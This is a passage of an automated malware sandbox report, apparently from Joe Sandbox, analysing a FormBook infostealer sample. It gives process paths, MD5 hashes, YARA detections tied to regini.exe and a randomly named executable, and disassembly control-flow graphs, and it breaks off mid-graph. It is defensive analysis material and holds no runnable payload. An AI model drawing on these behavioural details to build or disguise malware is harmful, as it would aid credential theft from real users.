                                                                                Start date:03/12/2024
                                                                                Path:C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe"
                                                                                Imagebase:0x190000
                                                                                File size:140'800 bytes
                                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.4515540359.0000000003660000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                Reputation:high
                                                                                Has exited:false

                                                                                General

                                                                                Target ID:10
                                                                                Start time:08:21:00
                                                                                Start date:03/12/2024
                                                                                Path:C:\Windows\SysWOW64\regini.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Windows\SysWOW64\regini.exe"
                                                                                Imagebase:0x7d0000
                                                                                File size:41'472 bytes
                                                                                MD5 hash:C99C3BB423097FCF4990539FC1ED60E3
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.4514408962.0000000000460000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.4514626352.0000000000700000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.4515595244.0000000002AB0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                Reputation:moderate
                                                                                Has exited:false

                                                                                General

                                                                                Target ID:11
                                                                                Start time:08:21:15
                                                                                Start date:03/12/2024
                                                                                Path:C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe"
                                                                                Imagebase:0x190000
                                                                                File size:140'800 bytes
                                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.4517476095.0000000005080000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                Reputation:high
                                                                                Has exited:false

                                                                                General

                                                                                Target ID:13
                                                                                Start time:08:21:36
                                                                                Start date:03/12/2024
                                                                                Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                Imagebase:0x7ff79f9e0000
                                                                                File size:676'768 bytes
                                                                                MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Disassembly

                                                                                Reset < >

                                                                                  Execution Graph

                                                                                  Execution Coverage:15.2%
                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                  Signature Coverage:0%
                                                                                  Total number of Nodes:22
                                                                                  Total number of Limit Nodes:2
                                                                                  execution_graph 12139 27fe7f8 12140 27fe83a 12139->12140 12141 27fe840 GetModuleHandleW 12139->12141 12140->12141 12142 27fe86d 12141->12142 12143 27f79d0 12144 27f79da 12143->12144 12146 27f7ec8 12143->12146 12147 27f7eed 12146->12147 12152 27f7fd8 12147->12152 12156 27f7f01 12147->12156 12160 27f7fc7 12147->12160 12154 27f7fff 12152->12154 12153 27f80dc 12153->12153 12154->12153 12164 27f7bec 12154->12164 12157 27f7ef7 12156->12157 12158 27f7f77 12156->12158 12157->12144 12158->12157 12159 27f7bec CreateActCtxA 12158->12159 12159->12157 12161 27f7fd8 12160->12161 12162 27f80dc 12161->12162 12163 27f7bec CreateActCtxA 12161->12163 12163->12162 12165 27f9068 CreateActCtxA 12164->12165 12167 27f912b 12165->12167 12167->12167

                                                                                  Executed Functions

                                                                                  Function 027F08AC Relevance: 2.8, Strings: 2, Instructions: 253COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 586 27f08ac-27f08b3 587 27f08b9-27f08c3 586->587 588 27f0f30-27f0f52 586->588 587->588 589 27f08c9-27f08d9 587->589 592 27f0f56 588->592 593 27f0f54-27f0f55 588->593 589->588 591 27f08df-27f08e9 589->591 591->588 594 27f08ef-27f0904 591->594 596 27f0f5a 592->596 597 27f0f58 592->597 593->592 594->588 595 27f088b-27f089f 594->595 600 27f0f29-27f0f2f 595->600 601 27f08a5 595->601 598 27f0f5e 596->598 599 27f0f5c-27f0f5d 596->599 597->598 602 27f0f62 598->602 603 27f0f60-27f0f61 598->603 599->598 601->600 604 27f0f66 602->604 605 27f0f64-27f0f65 602->605 603->604 606 27f0f6a 604->606 607 27f0f68-27f0f6c 604->607 605->604 608 27f0f6e 606->608 609 27f0f6c 606->609 607->608 610 27f0f72 608->610 611 27f0f70 608->611 609->608 612 27f0f76-27f0f8a 610->612 613 27f0f74 610->613 611->610 616 27f0f8e 612->616 617 27f0f8c 612->617 613->612 618 27f0f92 616->618 619 27f0f90 616->619 617->616 620 27f0f96 618->620 621 27f0f94 618->621 619->618 622 27f0f9a 620->622 623 27f0f98 620->623 621->620 624 27f0fa2 621->624 625 27f0f9e 622->625 626 27f0f9c 622->626 623->622 627 27f0fa6 624->627 628 27f0fa4 624->628 625->624 630 27f0fa0 625->630 626->625 629 27f0fa9 626->629 631 27f0faa 627->631 632 27f0fa8 627->632 633 27f0fab 628->633 629->631 630->624 631->633 634 27f0fae 631->634 632->629 633->634 635 27f0fb2-27f0fc6 634->635 636 27f0fb0 634->636 641 27f0fca-27f0fd2 635->641 642 27f0fc8 635->642 636->635 645 27f0fd6 641->645 646 27f0fd4 641->646 642->641 647 27f0fda-27f1042 call 27f00e4 645->647 648 27f0fd8 645->648 646->645 656 27f1045 647->656 648->647 657 27f104a-27f105f 656->657 658 27f112a-27f116c call 27f00f4 657->658 659 27f1065 657->659 680 27f116e call 27f1ded 658->680 681 27f116e call 27f22fb 658->681 682 27f116e call 27f2185 658->682 683 27f116e call 27f1b13 658->683 659->656 659->658 660 27f107f-27f1091 659->660 661 27f10dc-27f10f5 659->661 662 27f106c-27f106f 659->662 663 27f10fa-27f1125 659->663 664 27f1093-27f10a0 659->664 665 27f10a2-27f10be 659->665 666 27f10c0-27f10d7 659->666 660->657 661->657 667 27f1078 662->667 668 27f1071-27f1076 662->668 663->657 664->657 665->657 666->657 671 27f107d 667->671 668->671 671->657 679 27f1174-27f117d 680->679 681->679 682->679 683->679
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2081731223.00000000027F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_27f0000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Teyq$Teyq
                                                                                  • API String ID: 0-268401272
                                                                                  • Opcode ID: 07bfd6e3f6eb127391a7760e4e7e16e7be1bae60d1d7293bb0ff516bb11b7108
                                                                                  • Instruction ID: 44784a3af72238b99253fb4dcef3908c985d93f1733f904ed4828c76950a6471
                                                                                  • Opcode Fuzzy Hash: 07bfd6e3f6eb127391a7760e4e7e16e7be1bae60d1d7293bb0ff516bb11b7108
                                                                                  • Instruction Fuzzy Hash: EA912332A0D681CFD7958B68C8509AAFBF2FF97310B1A909AD645AB35BC3309905CF51
                                                                                  Function 027F0B33 Relevance: 2.7, Strings: 2, Instructions: 243COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 684 27f0b33-27f0b34 685 27f0bae-27f0bb0 684->685 686 27f0b36 684->686 689 27f0bb6-27f0bc0 685->689 690 27f0f30-27f0f52 685->690 687 27f0b38-27f0b52 686->687 688 27f0af2-27f0af3 686->688 687->685 688->684 689->690 691 27f0bc6-27f0bd6 689->691 696 27f0f56 690->696 697 27f0f54-27f0f55 690->697 691->690 692 27f0bdc-27f0be6 691->692 692->690 695 27f0bec-27f0bfc 692->695 695->690 698 27f0c02-27f0c0c 695->698 699 27f0f5a 696->699 700 27f0f58 696->700 697->696 698->690 703 27f0c12-27f0c27 698->703 701 27f0f5e 699->701 702 27f0f5c-27f0f5d 699->702 700->701 704 27f0f62 701->704 705 27f0f60-27f0f61 701->705 702->701 703->690 706 27f0f66 704->706 707 27f0f64-27f0f65 704->707 705->706 708 27f0f6a 706->708 709 27f0f68-27f0f6c 706->709 707->706 710 27f0f6e 708->710 711 27f0f6c 708->711 709->710 712 27f0f72 710->712 713 27f0f70 710->713 711->710 714 27f0f76-27f0f8a 712->714 715 27f0f74 712->715 713->712 718 27f0f8e 714->718 719 27f0f8c 714->719 715->714 720 27f0f92 718->720 721 27f0f90 718->721 719->718 722 27f0f96 720->722 723 27f0f94 720->723 721->720 724 27f0f9a 722->724 725 27f0f98 722->725 723->722 726 27f0fa2 723->726 727 27f0f9e 724->727 728 27f0f9c 724->728 725->724 729 27f0fa6 726->729 730 27f0fa4 726->730 727->726 732 27f0fa0 727->732 728->727 731 27f0fa9 728->731 733 27f0faa 729->733 734 27f0fa8 729->734 735 27f0fab 730->735 731->733 732->726 733->735 736 27f0fae 733->736 734->731 735->736 737 27f0fb2-27f0fc6 736->737 738 27f0fb0 736->738 743 27f0fca-27f0fd2 737->743 744 27f0fc8 737->744 738->737 747 27f0fd6 743->747 748 27f0fd4 743->748 744->743 749 27f0fda-27f101d call 27f00e4 747->749 750 27f0fd8 747->750 748->747 755 27f1027-27f102a 749->755 750->749 756 27f1033-27f1042 755->756 758 27f1045 756->758 759 27f104a-27f105f 758->759 760 27f112a-27f1154 call 27f00f4 759->760 761 27f1065 759->761 780 27f115a-27f116c 760->780 761->758 761->760 762 27f107f-27f1091 761->762 763 27f10dc-27f10f5 761->763 764 27f106c-27f106f 761->764 765 27f10fa-27f1125 761->765 766 27f1093-27f10a0 761->766 767 27f10a2-27f10be 761->767 768 27f10c0-27f10d7 761->768 762->759 763->759 769 27f1078 764->769 770 27f1071-27f1076 764->770 765->759 766->759 767->759 768->759 773 27f107d 769->773 770->773 773->759 782 27f116e call 27f1ded 780->782 783 27f116e call 27f22fb 780->783 784 27f116e call 27f2185 780->784 785 27f116e call 27f1b13 780->785 781 27f1174-27f117d 782->781 783->781 784->781 785->781
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2081731223.00000000027F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_27f0000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Teyq$Teyq
                                                                                  • API String ID: 0-268401272
                                                                                  • Opcode ID: 80e882db4755d95798c1f19ddf5bd1f23457f96378540316a2a7bc6f44d8789b
                                                                                  • Instruction ID: 2be664965dc527a2449443e11fcec2f45238dc50943f7df460fc6542fdb03508
                                                                                  • Opcode Fuzzy Hash: 80e882db4755d95798c1f19ddf5bd1f23457f96378540316a2a7bc6f44d8789b
                                                                                  • Instruction Fuzzy Hash: E1910271A08285CFD785CF69C855AAAFBF1FF46310F1AC09AD645AB36BC3309905CB91
                                                                                  Function 027F0E8D Relevance: 2.7, Strings: 2, Instructions: 237COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 886 27f0e8d-27f0e94 887 27f0e9a-27f0ea4 886->887 888 27f0f30-27f0f52 886->888 887->888 889 27f0eaa-27f0eb4 887->889 893 27f0f56 888->893 894 27f0f54-27f0f55 888->894 889->888 890 27f0eb6-27f0ec0 889->890 890->888 892 27f0ec2-27f0ecc 890->892 892->888 895 27f0ece-27f0ed8 892->895 896 27f0f5a 893->896 897 27f0f58 893->897 894->893 895->888 900 27f0eda-27f0ee4 895->900 898 27f0f5e 896->898 899 27f0f5c-27f0f5d 896->899 897->898 901 27f0f62 898->901 902 27f0f60-27f0f61 898->902 899->898 900->888 903 27f0ee6-27f0ef0 900->903 904 27f0f66 901->904 905 27f0f64-27f0f65 901->905 902->904 903->888 906 27f0ef2-27f0efc 903->906 907 27f0f6a 904->907 908 27f0f68-27f0f6c 904->908 905->904 906->888 909 27f0efe-27f0f08 906->909 910 27f0f6e 907->910 911 27f0f6c 907->911 908->910 909->888 912 27f0f72 910->912 913 27f0f70 910->913 911->910 914 27f0f76-27f0f8a 912->914 915 27f0f74 912->915 913->912 918 27f0f8e 914->918 919 27f0f8c 914->919 915->914 920 27f0f92 918->920 921 27f0f90 918->921 919->918 922 27f0f96 920->922 923 27f0f94 920->923 921->920 924 27f0f9a 922->924 925 27f0f98 922->925 923->922 926 27f0fa2 923->926 927 27f0f9e 924->927 928 27f0f9c 924->928 925->924 929 27f0fa6 926->929 930 27f0fa4 926->930 927->926 932 27f0fa0 927->932 928->927 931 27f0fa9 928->931 933 27f0faa 929->933 934 27f0fa8 929->934 935 27f0fab 930->935 931->933 932->926 933->935 936 27f0fae 933->936 934->931 935->936 937 27f0fb2-27f0fc6 936->937 938 27f0fb0 936->938 943 27f0fca-27f0fd2 937->943 944 27f0fc8 937->944 938->937 947 27f0fd6 943->947 948 27f0fd4 943->948 944->943 949 27f0fda-27f1042 call 27f00e4 947->949 950 27f0fd8 947->950 948->947 958 27f1045 949->958 950->949 959 27f104a-27f105f 958->959 960 27f112a-27f116c call 27f00f4 959->960 961 27f1065 959->961 982 27f116e call 27f1ded 960->982 983 27f116e call 27f22fb 960->983 984 27f116e call 27f2185 960->984 985 27f116e call 27f1b13 960->985 961->958 961->960 962 27f107f-27f1091 961->962 963 27f10dc-27f10f5 961->963 964 27f106c-27f106f 961->964 965 27f10fa-27f1125 961->965 966 27f1093-27f10a0 961->966 967 27f10a2-27f10be 961->967 968 27f10c0-27f10d7 961->968 962->959 963->959 969 27f1078 964->969 970 27f1071-27f1076 964->970 965->959 966->959 967->959 968->959 973 27f107d 969->973 970->973 973->959 981 27f1174-27f117d 982->981 983->981 984->981 985->981
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2081731223.00000000027F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_27f0000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Teyq$Teyq
                                                                                  • API String ID: 0-268401272
                                                                                  • Opcode ID: 3eba086e91492596d4a9aedcfdea79f86af1689ca2df50227de13f01805bac07
                                                                                  • Instruction ID: 379efe3d64bbbda4fb14546325bbe200604079c1a422fa241637ddf378a0e9e2
                                                                                  • Opcode Fuzzy Hash: 3eba086e91492596d4a9aedcfdea79f86af1689ca2df50227de13f01805bac07
                                                                                  • Instruction Fuzzy Hash: 93910171A19285CFD790CB69C8549AAFBF1FF46310F1AC09AE645AB36BC330D905CB91
                                                                                  Function 027F0D21 Relevance: 2.7, Strings: 2, Instructions: 237COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 786 27f0d21-27f0d22 787 27f0d9c-27f0da0 786->787 788 27f0d24 786->788 791 27f0da6-27f0db6 787->791 792 27f0f30-27f0f52 787->792 789 27f0d26-27f0d39 788->789 790 27f0ce0-27f0cec 788->790 789->787 790->792 794 27f0cf2-27f0d02 790->794 791->792 793 27f0dbc-27f0dc6 791->793 798 27f0f56 792->798 799 27f0f54-27f0f55 792->799 793->792 796 27f0dcc-27f0ddc 793->796 794->792 796->792 800 27f0f5a 798->800 801 27f0f58 798->801 799->798 802 27f0f5e 800->802 803 27f0f5c-27f0f5d 800->803 801->802 804 27f0f62 802->804 805 27f0f60-27f0f61 802->805 803->802 806 27f0f66 804->806 807 27f0f64-27f0f65 804->807 805->806 808 27f0f6a 806->808 809 27f0f68-27f0f6c 806->809 807->806 810 27f0f6e 808->810 811 27f0f6c 808->811 809->810 812 27f0f72 810->812 813 27f0f70 810->813 811->810 814 27f0f76-27f0f8a 812->814 815 27f0f74 812->815 813->812 818 27f0f8e 814->818 819 27f0f8c 814->819 815->814 820 27f0f92 818->820 821 27f0f90 818->821 819->818 822 27f0f96 820->822 823 27f0f94 820->823 821->820 824 27f0f9a 822->824 825 27f0f98 822->825 823->822 826 27f0fa2 823->826 827 27f0f9e 824->827 828 27f0f9c 824->828 825->824 829 27f0fa6 826->829 830 27f0fa4 826->830 827->826 832 27f0fa0 827->832 828->827 831 27f0fa9 828->831 833 27f0faa 829->833 834 27f0fa8 829->834 835 27f0fab 830->835 831->833 832->826 833->835 836 27f0fae 833->836 834->831 835->836 837 27f0fb2-27f0fc6 836->837 838 27f0fb0 836->838 843 27f0fca-27f0fd2 837->843 844 27f0fc8 837->844 838->837 847 27f0fd6 843->847 848 27f0fd4 843->848 844->843 849 27f0fda-27f1042 call 27f00e4 847->849 850 27f0fd8 847->850 848->847 858 27f1045 849->858 850->849 859 27f104a-27f105f 858->859 860 27f112a-27f116c call 27f00f4 859->860 861 27f1065 859->861 882 27f116e call 27f1ded 860->882 883 27f116e call 27f22fb 860->883 884 27f116e call 27f2185 860->884 885 27f116e call 27f1b13 860->885 861->858 861->860 862 27f107f-27f1091 861->862 863 27f10dc-27f10f5 861->863 864 27f106c-27f106f 861->864 865 27f10fa-27f1125 861->865 866 27f1093-27f10a0 861->866 867 27f10a2-27f10be 861->867 868 27f10c0-27f10d7 861->868 862->859 863->859 869 27f1078 864->869 870 27f1071-27f1076 864->870 865->859 866->859 867->859 868->859 873 27f107d 869->873 870->873 873->859 881 27f1174-27f117d 882->881 883->881 884->881 885->881
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2081731223.00000000027F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_27f0000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Teyq$Teyq
                                                                                  • API String ID: 0-268401272
                                                                                  • Opcode ID: 3bb4a586a220b4e5b817ad316575b283c96167f9cc2dd9ffa4664ad7ee532732
                                                                                  • Instruction ID: e8efa4e53d166e4d859fdfee72832b72e0d102c8b7faba0f30dc363bf3b786f6
                                                                                  • Opcode Fuzzy Hash: 3bb4a586a220b4e5b817ad316575b283c96167f9cc2dd9ffa4664ad7ee532732
                                                                                  • Instruction Fuzzy Hash: CD912271A0C285CFD785CB69C8959AAFFF1FF4A310B1A809AD645AB367C3309905CB91
                                                                                  Function 027F09C5 Relevance: 2.7, Strings: 2, Instructions: 221COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 986 27f09c5-27f09cc 987 27f09d2-27f09dc 986->987 988 27f0f30-27f0f52 986->988 987->988 989 27f09e2-27f09f2 987->989 993 27f0f56 988->993 994 27f0f54-27f0f55 988->994 989->988 990 27f09f8-27f0a02 989->990 990->988 992 27f0a08-27f0a18 990->992 992->988 995 27f0f5a 993->995 996 27f0f58 993->996 994->993 997 27f0f5e 995->997 998 27f0f5c-27f0f5d 995->998 996->997 999 27f0f62 997->999 1000 27f0f60-27f0f61 997->1000 998->997 1001 27f0f66 999->1001 1002 27f0f64-27f0f65 999->1002 1000->1001 1003 27f0f6a 1001->1003 1004 27f0f68-27f0f6c 1001->1004 1002->1001 1005 27f0f6e 1003->1005 1006 27f0f6c 1003->1006 1004->1005 1007 27f0f72 1005->1007 1008 27f0f70 1005->1008 1006->1005 1009 27f0f76-27f0f8a 1007->1009 1010 27f0f74 1007->1010 1008->1007 1013 27f0f8e 1009->1013 1014 27f0f8c 1009->1014 1010->1009 1015 27f0f92 1013->1015 1016 27f0f90 1013->1016 1014->1013 1017 27f0f96 1015->1017 1018 27f0f94 1015->1018 1016->1015 1019 27f0f9a 1017->1019 1020 27f0f98 1017->1020 1018->1017 1021 27f0fa2 1018->1021 1022 27f0f9e 1019->1022 1023 27f0f9c 1019->1023 1020->1019 1024 27f0fa6 1021->1024 1025 27f0fa4 1021->1025 1022->1021 1027 27f0fa0 1022->1027 1023->1022 1026 27f0fa9 1023->1026 1028 27f0faa 1024->1028 1029 27f0fa8 1024->1029 1030 27f0fab 1025->1030 1026->1028 1027->1021 1028->1030 1031 27f0fae 1028->1031 1029->1026 1030->1031 1032 27f0fb2-27f0fc6 1031->1032 1033 27f0fb0 1031->1033 1038 27f0fca-27f0fd2 1032->1038 1039 27f0fc8 1032->1039 1033->1032 1042 27f0fd6 1038->1042 1043 27f0fd4 1038->1043 1039->1038 1044 27f0fda-27f1042 call 27f00e4 1042->1044 1045 27f0fd8 1042->1045 1043->1042 1053 27f1045 1044->1053 1045->1044 1054 27f104a-27f105f 1053->1054 1055 27f112a-27f116c call 27f00f4 1054->1055 1056 27f1065 1054->1056 1077 27f116e call 27f1ded 1055->1077 1078 27f116e call 27f22fb 1055->1078 1079 27f116e call 27f2185 1055->1079 1080 27f116e call 27f1b13 1055->1080 1056->1053 1056->1055 1057 27f107f-27f1091 1056->1057 1058 27f10dc-27f10f5 1056->1058 1059 27f106c-27f106f 1056->1059 1060 27f10fa-27f1125 1056->1060 1061 27f1093-27f10a0 1056->1061 1062 27f10a2-27f10be 1056->1062 1063 27f10c0-27f10d7 1056->1063 1057->1054 1058->1054 1064 27f1078 1059->1064 1065 27f1071-27f1076 1059->1065 1060->1054 1061->1054 1062->1054 1063->1054 1068 27f107d 1064->1068 1065->1068 1068->1054 1076 27f1174-27f117d 1077->1076 1078->1076 1079->1076 1080->1076
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2081731223.00000000027F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_27f0000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Teyq$Teyq
                                                                                  • API String ID: 0-268401272
                                                                                  • Opcode ID: 0e0e74cd940acc0000e94d89c13dff89154f4e434d103a85bed36b79b3524d6c
                                                                                  • Instruction ID: 2e3a652fe305ed7495dc423f2080fd4cd173d7025c238897113f9f813379c19b
                                                                                  • Opcode Fuzzy Hash: 0e0e74cd940acc0000e94d89c13dff89154f4e434d103a85bed36b79b3524d6c
                                                                                  • Instruction Fuzzy Hash: CA812371A0C285CFD785CF69C855AAAFFF1FF46310B1680AAD645AB367C3309905CB91
                                                                                  Function 027F0D89 Relevance: 2.7, Strings: 2, Instructions: 221COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1081 27f0d89-27f0d90 1082 27f0d96-27f0da0 1081->1082 1083 27f0f30-27f0f52 1081->1083 1082->1083 1085 27f0da6-27f0db6 1082->1085 1088 27f0f56 1083->1088 1089 27f0f54-27f0f55 1083->1089 1085->1083 1087 27f0dbc-27f0dc6 1085->1087 1087->1083 1090 27f0dcc-27f0ddc 1087->1090 1091 27f0f5a 1088->1091 1092 27f0f58 1088->1092 1089->1088 1090->1083 1093 27f0f5e 1091->1093 1094 27f0f5c-27f0f5d 1091->1094 1092->1093 1095 27f0f62 1093->1095 1096 27f0f60-27f0f61 1093->1096 1094->1093 1097 27f0f66 1095->1097 1098 27f0f64-27f0f65 1095->1098 1096->1097 1099 27f0f6a 1097->1099 1100 27f0f68-27f0f6c 1097->1100 1098->1097 1101 27f0f6e 1099->1101 1102 27f0f6c 1099->1102 1100->1101 1103 27f0f72 1101->1103 1104 27f0f70 1101->1104 1102->1101 1105 27f0f76-27f0f8a 1103->1105 1106 27f0f74 1103->1106 1104->1103 1109 27f0f8e 1105->1109 1110 27f0f8c 1105->1110 1106->1105 1111 27f0f92 1109->1111 1112 27f0f90 1109->1112 1110->1109 1113 27f0f96 1111->1113 1114 27f0f94 1111->1114 1112->1111 1115 27f0f9a 1113->1115 1116 27f0f98 1113->1116 1114->1113 1117 27f0fa2 1114->1117 1118 27f0f9e 1115->1118 1119 27f0f9c 1115->1119 1116->1115 1120 27f0fa6 1117->1120 1121 27f0fa4 1117->1121 1118->1117 1123 27f0fa0 1118->1123 1119->1118 1122 27f0fa9 1119->1122 1124 27f0faa 1120->1124 1125 27f0fa8 1120->1125 1126 27f0fab 1121->1126 1122->1124 1123->1117 1124->1126 1127 27f0fae 1124->1127 1125->1122 1126->1127 1128 27f0fb2-27f0fc6 1127->1128 1129 27f0fb0 1127->1129 1134 27f0fca-27f0fd2 1128->1134 1135 27f0fc8 1128->1135 1129->1128 1138 27f0fd6 1134->1138 1139 27f0fd4 1134->1139 1135->1134 1140 27f0fda-27f1042 call 27f00e4 1138->1140 1141 27f0fd8 1138->1141 1139->1138 1149 27f1045 1140->1149 1141->1140 1150 27f104a-27f105f 1149->1150 1151 27f112a-27f116c call 27f00f4 1150->1151 1152 27f1065 1150->1152 1173 27f116e call 27f1ded 1151->1173 1174 27f116e call 27f22fb 1151->1174 1175 27f116e call 27f2185 1151->1175 1176 27f116e call 27f1b13 1151->1176 1152->1149 1152->1151 1153 27f107f-27f1091 1152->1153 1154 27f10dc-27f10f5 1152->1154 1155 27f106c-27f106f 1152->1155 1156 27f10fa-27f1125 1152->1156 1157 27f1093-27f10a0 1152->1157 1158 27f10a2-27f10be 1152->1158 1159 27f10c0-27f10d7 1152->1159 1153->1150 1154->1150 1160 27f1078 1155->1160 1161 27f1071-27f1076 1155->1161 1156->1150 1157->1150 1158->1150 1159->1150 1164 27f107d 1160->1164 1161->1164 1164->1150 1172 27f1174-27f117d 1173->1172 1174->1172 1175->1172 1176->1172
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2081731223.00000000027F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_27f0000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Teyq$Teyq
                                                                                  • API String ID: 0-268401272
                                                                                  • Opcode ID: 9dbf22f25c199fa88789511ccb8ec1170dd915445ed0fd663b212c4667677c8e
                                                                                  • Instruction ID: e2aee58e5a7385805781408c2d5b8182457d52c96939ea76cef9b3ff25af0e52
                                                                                  • Opcode Fuzzy Hash: 9dbf22f25c199fa88789511ccb8ec1170dd915445ed0fd663b212c4667677c8e
                                                                                  • Instruction Fuzzy Hash: 34812171A0C285CFD785CF69C895AAAFBF1FF46300B1A809AD645AB367C3309905CB91
                                                                                  Function 027F0930 Relevance: 2.7, Strings: 2, Instructions: 219COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1177 27f0930-27f0937 1178 27f093d-27f0947 1177->1178 1179 27f0f30-27f0f52 1177->1179 1178->1179 1180 27f094d-27f0962 1178->1180 1185 27f0f56 1179->1185 1186 27f0f54-27f0f55 1179->1186 1180->1179 1181 27f088b-27f089f 1180->1181 1183 27f0f29-27f0f2f 1181->1183 1184 27f08a5 1181->1184 1184->1183 1187 27f0f5a 1185->1187 1188 27f0f58 1185->1188 1186->1185 1189 27f0f5e 1187->1189 1190 27f0f5c-27f0f5d 1187->1190 1188->1189 1191 27f0f62 1189->1191 1192 27f0f60-27f0f61 1189->1192 1190->1189 1193 27f0f66 1191->1193 1194 27f0f64-27f0f65 1191->1194 1192->1193 1195 27f0f6a 1193->1195 1196 27f0f68-27f0f6c 1193->1196 1194->1193 1197 27f0f6e 1195->1197 1198 27f0f6c 1195->1198 1196->1197 1199 27f0f72 1197->1199 1200 27f0f70 1197->1200 1198->1197 1201 27f0f76-27f0f8a 1199->1201 1202 27f0f74 1199->1202 1200->1199 1205 27f0f8e 1201->1205 1206 27f0f8c 1201->1206 1202->1201 1207 27f0f92 1205->1207 1208 27f0f90 1205->1208 1206->1205 1209 27f0f96 1207->1209 1210 27f0f94 1207->1210 1208->1207 1211 27f0f9a 1209->1211 1212 27f0f98 1209->1212 1210->1209 1213 27f0fa2 1210->1213 1214 27f0f9e 1211->1214 1215 27f0f9c 1211->1215 1212->1211 1216 27f0fa6 1213->1216 1217 27f0fa4 1213->1217 1214->1213 1219 27f0fa0 1214->1219 1215->1214 1218 27f0fa9 1215->1218 1220 27f0faa 1216->1220 1221 27f0fa8 1216->1221 1222 27f0fab 1217->1222 1218->1220 1219->1213 1220->1222 1223 27f0fae 1220->1223 1221->1218 1222->1223 1224 27f0fb2-27f0fc6 1223->1224 1225 27f0fb0 1223->1225 1230 27f0fca-27f0fd2 1224->1230 1231 